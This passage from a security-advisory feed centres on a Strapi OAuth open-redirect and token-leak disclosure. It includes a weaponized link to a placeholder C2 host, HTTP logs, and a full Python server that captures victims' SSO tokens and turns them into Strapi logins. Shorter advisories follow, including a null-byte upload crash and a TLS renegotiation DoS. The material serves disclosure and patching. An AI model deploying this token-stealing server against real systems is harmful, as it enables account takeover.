    grantConfig[provider].redirect_uri = getService('providers').buildRedirectUri(provider);

    return grant(grantConfig)(ctx, next);
...
```

Possible patch:

```js
grantConfig[provider].callback = process.env[`${provider.toUpperCase()}_REDIRECT_URL`] || grantConfig[provider].callback
```

`_.get(ctx, 'query.callback')` = `XXXXX["callback"]` and `_.get(ctx, 'session')` = `$_COOKIE["koa.sess"]` (which is `{"grant":{"provider":"microsoft","dynamic":{"callback":"https://XXXXXXX/"}},"_expire":1701275652123,"_maxAge":86400000}`) so `_.get(ctx, 'session.grant.dynamic.callback')` = `https://XXXXXXX/`.

The route is clearly defined here:

File: [packages/plugins/users-permissions/server/routes/content-api/auth.js](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/routes/content-api/auth.js)

```js
'use strict';

module.exports = [
  //...
  {
    method: 'GET',
    path: '/auth/:provider/callback',
    handler: 'auth.callback',
    config: {
      prefix: '',
    },
  },
  //...
];
```

File: [packages/plugins/users-permissions/server/services/providers-registry.js](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/services/providers-registry.js)

```js
const getInitialProviders = ({ purest }) => ({
  //..
  async microsoft({ accessToken }) {
    const microsoft = purest({ provider: 'microsoft' });

    return microsoft
      .get('me')
      .auth(accessToken)
      .request()
      .then(({ body }) => ({
        username: body.userPrincipalName,
        email: body.userPrincipalName,
      }));
  },
  //..
});
```

If parameter `XXXXX["callback"]` is defined in the GET request, the assignment does not evaluate all conditions, but stops at the beginning. The value is then stored in the cookie `koa.sess`:

`koa.sess`=`eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2FkbWluLmludGUubmV0YXRtby5jb20vdXNlcnMvYXV0aC9yZWRpcmVjdCJ9fSwiX2V4cGlyZSI6MTcwMTI3NTY1MjEyMywiX21heEFnZSI6ODY0MDAwMDB9`

Which once base64 decoded becomes `{"grant":{"provider":"microsoft","dynamic":{"callback":"https://<TARGET>/users/auth/redirect"}},"_expire":1701275652123,"_maxAge":86400000}`.

The signature of the cookie is stored in cookie `koa.sess.sig`:

`koa.sess.sig`=`wTRmcVRrn88hWMdg84VvSD87-_0`

File: [packages/plugins/users-permissions/server/bootstrap/grant-config.js](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/bootstrap/grant-config.js)

```js
//..
  microsoft: {
    enabled: false,
    icon: 'windows',
    key: '',
    secret: '',
    callback: `${baseURL}/microsoft/callback`,
    scope: ['user.read'],
  },
//..
```

#### Vulnerability 2: Session token in URL

##### Description

Applications should not send session tokens as URL query parameters and use instead an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

###### Example 1: SSO token transmitted within URL (`XXXXX["access_token"]`)

- Path: /api/connect/microsoft
- Parameter: `XXXXX["callback"]`

When a callback was called, the 3rd party token was transmitted in an insecure way within the URL, which could be used to increase the impact of the Open Redirect vulnerability described previously by stealing the SSO token.

Weaponized payload:

```plaintext
https://<TARGET>/api/connect/microsoft?callback=http://<C2>:8080/
```

With a web server specially developed to exploit the vulnerability listening on `<C2>:8080`, it is possible to retrieve a JWT token allowing authentication on Strapi.

A user is on his browser when he decides to click on a link sent to him by e-mail.

![c4](https://github.com/strapi/strapi/assets/30262080/c6e22fa1-14a4-4c76-a832-d07305f265b6)

> The attacker places the malicious link in the URL bar to simulate a victim's click.

![c5](https://github.com/strapi/strapi/assets/30262080/4da28c5b-6501-4f93-9041-9917a2b070e6)

The server specially developed by the attacker to show that the vulnerability is exploitable, recovers the user's SSO token.

> Everything is invisible to the victim.

![c6](https://github.com/strapi/strapi/assets/30262080/58db0a31-3b3b-4648-958b-953eba88bf87)

Because the victim didn't change to another Web page.

![c7](https://github.com/strapi/strapi/assets/30262080/ab4dd6f9-02e1-42c9-9142-434db865f0d3)

The attacker can use the SSO token to authenticate himself within the application and retrieve a valid JWT token enabling him to interact with it.

![c8](https://github.com/strapi/strapi/assets/30262080/aab8d22f-5f0e-4a67-85a8-2e333df9b84b)

##### Details

###### Get the JWT token with the `access_token`

First of all, thanks to the SSO token, you authenticate yourself and get a JWT token to be able to interact with the various API routes.

Request (HTTP):

```http
GET /api/auth/microsoft/callback?access_token=eyJ0eXAiOiJKV<REDACTED>yBzA HTTP/1.1
Host: <TARGET>
```

Response (HTTP):

```http
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 Nov 2023 17:58:46 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 411
Connection: keep-alive
Content-Security-Policy: connect-src 'self' https:;img-src 'self' data: blob: https://market-assets.strapi.io;media-src 'self' data: blob:;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline'
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
Vary: Origin
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Powered-By: <REDACTED>

{"jwt":"eyJhbG<REDACTED>eCac","user":{"id":111,"username":"<REDACTED>@<REDACTED>-ext.com","email":"<redacted>@<redacted>-ext.com","provider":"microsoft","confirmed":true,"blocked":false,"createdAt":"2023-11-14T12:35:42.440Z","updatedAt":"2023-11-16T21:00:19.241Z","is_external":false}}
```

###### Request API routes using the JWT token

Then reuse the JWT token to request the API.

Request (HTTP):

```http
GET /api/users/me/groups?app=support HTTP/1.1
Host: <TARGET>
Authorization: Bearer eyJ<REDACTED>EeCac
```

Response (HTTP):

```http
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Nov 2023 13:45:42 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 24684
Connection: keep-alive
Content-Security-Policy: connect-src 'self' https:;img-src 'self' data: blob: https://market-assets.strapi.io;media-src 'self' data: blob:;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline'
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
Vary: Origin
X-RateLimit-Limit: 10
X-RateLimit-Remaining: 9
X-RateLimit-Reset: 1701179203
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Powered-By: <REDACTED>

{"apps":{"support":{"groups":[{"device_whitelist":null,"name":"test - support","id":10,"group_privileges":[{"id":37,<REDACTED>...
```

### POC (Web server stealing SSO token and retrieving JWT token then bypassing authentication)

```python
import base64
import json
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer
from sys import argv

# Strapi URL.
TARGET = "target.com"

# URLs to which victims are automatically redirected (absolute, so the
# Location header is not resolved relative to the attacker's server).
REDIRECT_URL = [
    "https://strapi.io",
    "https://www.google.fr"
]

# URL used to generate a valid JWT token for authentication within the
# application.
GEN_JWT_URL = f"https://{TARGET}/api/auth/microsoft/callback"


# This function is used to generate a curl command which once executed, will
# give us a valid JWT connection token.
def generate_curl_command(token):
    command = f"curl '{GEN_JWT_URL}?access_token={token}'"
    return command


# We create a custom HTTP server to retrieve users' SSO tokens.
class CustomServer(BaseHTTPRequestHandler):
    # Here we override the default logging function to reduce verbosity.
    def log_message(self, format, *args):
        pass

    # This function automatically redirects a user to the page defined in the
    # global variable linked to the redirection.
    def _set_response(self):
        self.send_response(302)
        self.send_header("Location", REDIRECT_URL[0])
        self.end_headers()

    # If an SSO token is present, we parse it and log the result in STDOUT.
    def do_GET(self):
        # This condition checks whether a token is present in the URL.
        if str(self.path).find("access_token") != -1:
            # If this is the case, we recover the token (parse_qs already
            # URL-decodes the value).
            query = urllib.parse.urlparse(self.path).query
            query_components = urllib.parse.parse_qs(query)
            access_token = query_components["access_token"][0]
            # In the token, which is a string in JWT format, we retrieve the
            # body part of the token.
            interesting_data = access_token.split(".")[1]
            # Patching base64 encoded data (JWT segments are unpadded base64url).
            interesting_data = interesting_data + "=" * (-len(interesting_data) % 4)
            # Parsing JSON.
            json_data = json.loads(base64.urlsafe_b64decode(interesting_data.encode()))
            given_name = json_data.get("given_name")
            family_name = json_data.get("family_name")
            ipaddr = json_data.get("ipaddr")
            upn = json_data.get("upn")
            print(f"[+] Token captured for {given_name} {family_name}, {upn} ({ipaddr}):\n{access_token}\n")
            print(f"[*] Run: \"{generate_curl_command(urllib.parse.quote(access_token, safe=''))}\" to get JWT token")
        self._set_response()
        self.wfile.write("Redirecting ...".encode("utf-8"))


def run(server_class=HTTPServer, handler_class=CustomServer, ip="0.0.0.0", port=8080):
    server_address = (ip, port)
    httpd = server_class(server_address, handler_class)
    print(f"Starting httpd ({ip}:{port}) ...")
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    print("Stopping httpd ...")


if __name__ == "__main__":
    if len(argv) == 3:
        run(ip=argv[1], port=int(argv[2]))
    else:
        run()
```

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WRVH-RCMR-9QFC
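The remediation section above recommends either an allowlist of redirect targets or a strict web-root-relative check with the site's own origin prepended. The following Node.js snippet is an added example written for this page, not Strapi's code or the advisory author's: it places the vulnerable first-truthy-value selection quoted from `connect()` next to a hardened version that applies both recommendations. `BASE_URL`, `CALLBACK_ALLOWLIST` and the function names are assumptions made for the example.

```javascript
// Added example (not Strapi's code): choosing the OAuth "callback" for a
// dynamic-callback endpoint such as /api/connect/:provider without turning it
// into an open redirect. BASE_URL and CALLBACK_ALLOWLIST are hypothetical
// deployment values.
const BASE_URL = 'https://app.example.com';
const CALLBACK_ALLOWLIST = new Set([
  'https://app.example.com/users/auth/redirect',
  'https://app.example.com/api/auth/microsoft/callback',
]);

// Shape of the vulnerable selection quoted in the advisory: the first truthy
// value wins and nothing is validated, so ?callback=https://google.fr/ (or the
// same value replayed from the koa.sess cookie) becomes the redirect target.
function pickCallbackVulnerable(query, session, configured) {
  return (query && query.callback) ||
    (session && session.grant && session.grant.dynamic && session.grant.dynamic.callback) ||
    configured;
}

// Hardened: a candidate is accepted only if it is a web-root-relative path
// (exactly one leading "/"), which is resolved against BASE_URL, or an https
// URL present verbatim in CALLBACK_ALLOWLIST. Anything else yields null.
function validateCallback(candidate) {
  if (typeof candidate !== 'string' || candidate.length === 0) return null;
  // Control characters and backslashes: some URL parsers fold "\" into "/".
  if (/[\u0000-\u001f\\]/.test(candidate)) return null;
  if (candidate.startsWith('/')) {
    if (candidate.startsWith('//')) return null; // protocol-relative => external host
    const resolved = new URL(candidate, BASE_URL);
    return resolved.origin === BASE_URL ? resolved.href : null;
  }
  let parsed;
  try {
    parsed = new URL(candidate);
  } catch (e) {
    return null; // neither relative nor a parseable absolute URL
  }
  if (parsed.protocol !== 'https:') return null; // drops javascript:, http:, data:
  return CALLBACK_ALLOWLIST.has(parsed.href) ? parsed.href : null;
}

// Same precedence as the original (query, then session, then static config),
// but an invalid value at any level falls through instead of being used.
function pickCallbackHardened(query, session, configured) {
  return validateCallback(query && query.callback) ||
    validateCallback(session && session.grant && session.grant.dynamic && session.grant.dynamic.callback) ||
    configured;
}
```

With the advisory's payload, `pickCallbackVulnerable` returns `https://google.fr/` while `pickCallbackHardened` falls back to the provider's configured callback; a root-relative `/users/auth/redirect` is still honoured, but only after being resolved against the application's own origin.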
12.06.2024 22:38:25 npm [NPM:GHSA-PM9Q-XJ9P-96PM] @strapi/plugin-upload has a Denial-of-Service via Improper Exception Handling (moderate)

### Summary

A Denial-of-Service was found in the media upload process causing the server to crash without restarting, affecting both development and production environments.

### Details

Usually, errors in the application cause it to log the error and keep it running for other clients. This behavior, in contrast, stops the server execution, making it unavailable for any clients until it's manually restarted.

### PoC

Due to a bug in what we believe to be Burp's decoding system, we couldn't produce a valid file to easily reproduce the vulnerability. Instead, the issue can be reproduced by following these steps:

1. Configure Burp's proxy between a browser and a Strapi server
2. Log in and upload an image through the Media Library page while having Burp's interceptor turned on
3. After capturing the upload POST request in Burp, add `%00` at the end of the file extension from the `Content-Disposition`, in the filename parameter (See reference image 1 below)
4. Using the cursor, select the added `%00` and right-click it. Click in Convert selection > URL > URL decode to transform the selected text into a null byte
5. Forward the modified request. The server should print an error and crash with the error `ERR_INVALID_ARG_VALUE` (See reference log 1 below)

By following the data flow, we reached the [line of code](https://github.com/strapi/strapi/blob/f1dd5cc8eef574bac6679aab6f93276e57497328/packages/providers/upload-local/src/index.ts#L86) where we believe the DoS is being caused.

The simpler way of fixing this vulnerability seems to be avoiding the error thrown by whitelisting the characters used in the extension.

#### Reference Image 1

![image](https://github.com/strapi/strapi/assets/8593673/c95278a1-1727-485e-b6f8-276074d9dd42)

#### Reference Log 1

```
[2024-03-22 10:23:42.629] http: POST /upload (22 ms) 400
node:internal/fs/utils:379
    const err = new ERR_INVALID_ARG_VALUE(
                ^

TypeError [ERR_INVALID_ARG_VALUE]: The argument 'path' must be a string, Uint8Array, or URL without null bytes. Received '/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/public/uploads/replaceme_png_88efe6a165.png\x00'
    at new WriteStream (node:internal/fs/streams:340:5)
    at Object.createWriteStream (node:fs:3123:10)
    at /mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/provider-upload-local/dist/index.js:71:33
    at new Promise (<anonymous>)
    at Object.uploadStream (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/provider-upload-local/dist/index.js:68:16)
    at Object.uploadStream (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/plugin-upload/server/register.js:80:35)
    at Object.upload (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/plugin-upload/server/services/provider.js:16:46)
    at Object.uploadImage (/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/node_modules/@strapi/plugin-upload/server/services/upload.js:220:48) {
  code: 'ERR_INVALID_ARG_VALUE'
}
```

### Impact

Denial-of-Service occurs when a service becomes unavailable for users or other services.

By sending a specially-crafted request, the server crashes without restarting. The entire server crashes with the thrown error instead of crashing only the single request and returning error 500 to the user.

Any user with access to the file upload functionality is able to exploit this vulnerability, affecting applications running in both development mode and production mode as well.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PM9Q-XJ9P-96PM
12.06.2024 22:38:03 npm [NPM:GHSA-6J89-FRXC-Q26M] @strapi/plugin-content-manager leaks data via relations via the Admin Panel (low)

### Summary

1. If a super admin creates a collection where an item in the collection has an association to another collection, a user with the Author Role can see the list of associated items they did not create. They should only see their own items that they created, not all items ever created.

### Details

At the top level every collection shows blank items for an Author if they did not create the item. This is ideal and works great. However if you associate one private collection to another private collection and an Author creates a new item, the pull down should not show the admin's list of previously created items. It should be blank until they add their own items.

### PoC

1. Sign in as Admin. Navigate to content creation.
2. Select a collection and verify you have items you created there. And that they have associations to other protected collections.
3. Verify role permissions for your collections are set to CRUD if user created.
4. Log out and sign in as an unrelated Author.
5. Navigate to content management and verify you see collections built by admin but empty for you (as expected)
6. Create a new item as an Author and see the card appear with attributes to fill out.
7. Use the form pull down for the associations.
8. Notice that protected collection items from Admin appear in drop down. These should be hidden

### Impact

Security vulnerability where authors have access to protected data created by admin. This could be passwords, emails or any other item created for the admin's collection. See images below for more context

Permissions set

![image](https://user-images.githubusercontent.com/364910/265132222-66e85726-5e01-4ad3-901a-809270a7f11b.png)

Good at top level, no items seen

![image](https://user-images.githubusercontent.com/364910/265132292-d63fa6df-f32d-48a3-80d0-48a651c570a8.png)

Drop down in Author login can see Admin data

![image](https://user-images.githubusercontent.com/364910/265132393-8105bae2-b45c-4327-b1c6-da093557e64f.png)

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6J89-FRXC-Q26M
12.06.2024 22:45:07 npm [NPM:GHSA-CC55-MVQC-G9MG] SummerNote Cross Site Scripting Vulnerability (moderate) SummerNote 0.8.18 is vulnerable to Cross Site Scripting (XSS) via the Code View Function. https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CC55-MVQC-G9MG

12.06.2024 21:10:04 ubuntu [USN-6819-3] Linux kernel (OEM) vulnerabilities (high) Several security issues were fixed in the Linux kernel. https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6819-3

12.06.2024 18:51:37 ubuntu [USN-6831-1] Linux kernel vulnerabilities (high) Several security issues were fixed in the Linux kernel. https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6831-1

12.06.2024 22:45:12 maven [MAVEN:GHSA-6Q97-8V3G-RPXW] Apache Submarine Server Core Incorrect Authorization vulnerability (critical) Incorrect Authorization vulnerability in Apache Submarine Server Core. This issue affects Apache Submarine Server Core: from 0.8.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6Q97-8V3G-RPXW

12.06.2024 22:44:50 maven [MAVEN:GHSA-V74C-QC46-9GG9] Apache Submarine Server Core has a SQL Injection Vulnerability (high) Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Submarine Server Core. This issue affects Apache Submarine Server Core: all versions. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V74C-QC46-9GG9

12.06.2024 22:44:27 maven [MAVEN:GHSA-JWCG-WV5X-VG3G] Apache Submarine Commons Utils has a hard-coded secret (moderate) Improper Authentication vulnerability in Apache Submarine Commons Utils. This issue affects Apache Submarine Commons Utils: from 0.8.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JWCG-WV5X-VG3G

12.06.2024 22:44:10 maven [MAVEN:GHSA-4C7Q-M7HC-PC92] Elasticsearch Remote Cluster Search Cross Cluster API Key insufficient restrictions (moderate) It was identified that if a cross-cluster API key (https://www.elastic.co/guide/en/elasticsearch/reference/8.14/security-api-create-cross-cluster-api-key.html#security-api-create-cross-cluster-api-key-request-body) restricts search for a given index using the query or the field_security parameter, and the same cross-cluster API key also grants replication for the same index, the search restrictions are not enforced during cross cluster search operations and search results may include documents and terms that should not be returned. This issue only affects the API key based security model for remote clusters (https://www.elastic.co/guide/en/elasticsearch/reference/8.14/remote-clusters.html#remote-clusters-security-models) that was previously a beta feature and is released as GA with 8.14.0. https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4C7Q-M7HC-PC92

12.06.2024 15:50:24 ubuntu [USN-6829-1] MATIO vulnerability (medium) MATIO could be made to crash if it received specially crafted input. https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6829-1

12.06.2024 14:59:10 ubuntu [USN-6830-1] libndp vulnerability (high) libndp could be made to crash or run programs if it received specially crafted network traffic. https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6830-1

12.06.2024 03:00:00 cisa [CISA-2024:0612] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (critical) CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0612

12.06.2024 03:00:00 debian [DSA-5709-1] firefox-esr security update https://secdb.nttzen.cloud/security-advisory/debian/DSA-5709-1

12.06.2024 03:00:00 oraclelinux [ELSA-2024-3823] rpm-ostree security update (moderate)

```
[2024.3-3]
- Backport https://github.com/coreos/rpm-ostree/security/advisories/GHSA-2m76-cwhg-7wv6 Resolves: #RHEL-31852
[2024.3-2]
- Backport https://github.com/coreos/rpm-ostree/security/advisories/GHSA-2m76-cwhg-7wv6 Resolves: #RHEL-31852
```

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3823

12.06.2024 03:00:00 oraclelinux [ELSA-2024-3837] 389-ds-base security update (important)

```
[2.4.5-8]
- Bump version to 2.4.5-8
- Fix License tag
[2.4.5-7]
- Bump version to 2.4.5-7
- Resolves: RHEL-34819 - redhat-ds:11/389-ds-base: Malformed userPassword may cause crash at do_modify in slapd/modify.c
- Resolves: RHEL-34825 - redhat-ds:11/389-ds-base: potential denial of service via specially crafted kerberos AS-REQ requ
```

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3837

12.06.2024 03:00:00 oraclelinux [ELSA-2024-3835] libreoffice security update (important)

```
[7.1.8.1-12.0.1]
- Replace colors with Oracle colors [Orabug: 32120093]
- Added the --with-hamcrest option to configure.
[7.1.8.1]
- Remove Red Hat branding
- Change vendor to RESF
[1:7.1.8.1-12]
- Fix CVE-2023-6185 escape url passed to gstreamer
- Fix CVE-2023-6186 check link target protocols
[1:7.1.8.1-11]
- Resolves: rhbz#2210193 CVE-2023-0950 Array Index UnderFlow in Calc Formula Parsing
- Resolves: rhbz#2210197 CVE-2023-2255 libreoffice: Remote documents loaded without prompt via IFrame
- Resolves: rhbz#2208510 CVE-2023-1183 libreoffice: Arbitrary File Write
[1:7.1.8.1-10]
- Fix erroneous libreoffice-ure dependencies
[1:7.1.8.1-9]
- Resolves: rhbz#2182392 CVE-2022-38745
[1:7.1.8.1-8]
- Resolves: rhbz#2134759 Untrusted Macros
- Resolves: rhbz#2134757 Weak Master Keys
- Resolves: rhbz#2134755 Static Initialization Vector
- Resolves: rhbz#2134761 Macro URL arbitrary script execution
```

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3835
13.06.2024 22:39:06maven[MAVEN:GHSA-X268-QPG6-W9G2] CrateDB has a Client initialized Session-Renegotiation DoS (moderate)**Summary** Client-Initiated TLS Renegotiation Denial of Service (DoS) Vulnerability at Port 4200**Details** A high-risk vulnerability has been identified where the TLS endpoint (port 4200) permits client-initiated renegotiation. In this scenario, an attacker can exploit this feature to repeatedly request renegotiation of security parameters during an ongoing TLS session. This flaw could lead to excessive consumption of CPU resources, resulting in potential server overload and service disruption. The vulnerability was confirmed using an openssl client where the command 'R' initiates renegotiation, followed by the server confirming with 'RENEGOTIATING'.**PoC** 1. Connect to the TLS server on port 4200 using an openssl client.2. Initiate a TLS session.3. Send the renegotiation command ('R') multiple times.4. Observe the server response to confirm renegotiation.**Impact** This vulnerability allows an attacker to perform a denial of service attack by exhausting server CPU resources through repeated TLS renegotiations. This impacts the availability of services running on the affected server, posing a significant risk to operational stability and security.TLS 1.3 explicitly forbids renegotiation, since it closes a window of opportunity for an attack.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-X268-QPG6-W9G2
14.06.2024 01:03:51maven[MAVEN:GHSA-4Q22-422G-M4PJ] Elasticsearch StackOverflow vulnerability (moderate)A flaw was discovered in Elasticsearch, affecting document ingestion when an index template contains a dynamic field mapping of “passthrough” type. Under certain circumstances, ingesting documents in this index would cause a StackOverflow exception to be thrown and ultimately lead to a Denial of Service. Note that passthrough fields is an experimental feature.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4Q22-422G-M4PJ
13.06.2024 17:44:19ubuntu[USN-6834-1] H2 vulnerabilities (critical)H2 could be made to allow arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6834-1
13.06.2024 15:35:18ubuntu[USN-6833-1] VTE vulnerabilityVTE could be made to consume resources and crash if it displayed specially crafted data.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6833-1
13.06.2024 11:32:09ubuntu[USN-6832-1] Virtuoso Open-Source Edition vulnerabilities (high)Open-Source Edition could be made to crash if it received specially crafted input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6832-1
13.06.2024 07:57:34ubuntu[USN-6829-1] matio vulnerability (medium)matio could be made to crash if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6829-1
13.06.2024 03:00:00cisa[CISA-2024:0613] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0613
13.06.2024 03:00:00mozilla[MFSA-2024-27] Security Vulnerabilities fixed in Firefox for iOS 127 (high)
- CVE-2024-38312: Private tabs could result in residual data related to browsing history in app bundle (moderate): When browsing private tabs, some data related to location history or webpage thumbnails could be persisted incorrectly within the sandboxed app bundle after app termination.
- CVE-2024-38313: Location URL bar could be visually spoofed with a fake toolbar (high): In certain scenarios a malicious website could attempt to display a fake location URL bar which could mislead users as to the actual website address.
https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-27
13.06.2024 03:00:00mozilla[MFSA-2024-28] Security Vulnerabilities fixed in Firefox ESR 115.12 (high)
- CVE-2024-5688: Use-after-free in JavaScript object transplant (high): If a garbage collection was triggered at the right time, a use-after-free could have occurred during object transplant.
- CVE-2024-5690: External protocol handlers leaked by timing attack (moderate): By monitoring the time certain operations take, an attacker could have guessed which external protocol handlers were functional on a user's system.
- CVE-2024-5691: Sandboxed iframes were able to bypass sandbox restrictions to open a new window (moderate): By tricking the browser with a `X-Frame-Options` header, a sandboxed iframe could have presented a button that, if clicked by a user, would bypass restrictions to open a new window.
- CVE-2024-5692: Bypass of file name restrictions during saving (moderate): On Windows 10, when using the 'Save As' functionality, an attacker could have tricked the browser into saving the file with a disallowed extension such as `.url` by including an invalid character in the extension. *Note:* This issue only affected Windows operating systems. Other operating systems are unaffected.
- CVE-2024-5693: Cross-Origin Image leak via Offscreen Canvas (moderate): Offscreen Canvas did not properly track cross-origin tainting, which could be used to access image data from another site in violation of same-origin policy.
- CVE-2024-5696: Memory Corruption in Text Fragments (moderate): By manipulating the text in an `<input>` tag, an attacker could have caused corrupt memory leading to a potentially exploitable crash.
- CVE-2024-5700: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (high): Memory safety bugs present in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
- CVE-2024-5702: Use-after-free in networking (high): Memory corruption in the networking stack could have led to a potentially exploitable crash.
https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-28
13.06.2024 03:00:00oraclelinux[ELSA-2024-3846] python-idna security update (moderate)
[2.10-7.0.1.1]
- Rebuild with release bump
[2.10-7.1]
- Security fix for CVE-2024-3651
Resolves: RHEL-33464
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3846
13.06.2024 03:00:00oraclelinux[ELSA-2024-3838] ruby security update (moderate)
[3.0.7-162]
- Upgrade to Ruby 3.0.7. Resolves: RHEL-35740
- Fix HTTP response splitting in CGI. Resolves: RHEL-35741
- Fix ReDoS vulnerability in URI. Resolves: RHEL-35742
- Fix ReDoS vulnerability in Time. Resolves: RHEL-35743
- Fix buffer overread vulnerability in StringIO. Resolves: RHEL-35744
- Fix RCE vulnerability with .rdoc_options in RDoc. Resolves: RHEL-35746
- Fix arbitrary memory address read vulnerability with Regex search. Resolves: RHEL-35747
[3.0.4-161]
- Fix OpenSSL.fips_mode and OpenSSL::PKey.read in OpenSSL 3 FIPS. Resolves: RHEL-12724
- ssl: use ffdhe2048 from RFC 7919 as the default DH group parameters. Related: RHEL-12724
[3.0.4-160]
- Bypass git submodule test failure on Git >= 2.38.1.
- Fix tests with Europe/Amsterdam pre-1970 time on tzdata version 2022b.
- Fix for tzdata-2022g.
- Fix File.utime test.
[3.0.4-160]
- Upgrade to Ruby 3.0.4. Resolves: rhbz#2096347
- OpenSSL test suite fixes due to disabled SHA1. Resolves: rhbz#2107696
- Fix double free in Regexp compilation. Resolves: CVE-2022-28738
- Fix buffer overrun in String-to-Float conversion. Resolves: CVE-2022-28739
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3838
13.06.2024 03:00:00freebsd[FREEBSD:92CD1C03-2940-11EF-BC02-001B217B3468] Gitlab -- Vulnerabilities (medium)
Gitlab reports:
- ReDoS in gomod dependency linker
- ReDoS in CI interpolation (fix bypass)
- ReDoS in Asana integration issue mapping when webhook is called
- XSS and content injection when viewing raw XHTML files on iOS devices
- Missing agentk request validation could cause KAS to panic
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:92CD1C03-2940-11EF-BC02-001B217B3468
14.06.2024 20:24:38ubuntu[USN-6817-3] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6817-3
14.06.2024 18:59:05ubuntu[USN-6818-3] Linux kernel (NVIDIA) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6818-3
14.06.2024 18:39:24ubuntu[USN-6821-4] Linux kernel (Azure) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6821-4
14.06.2024 03:00:00debian[DSA-5710-1] chromium security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5710-1
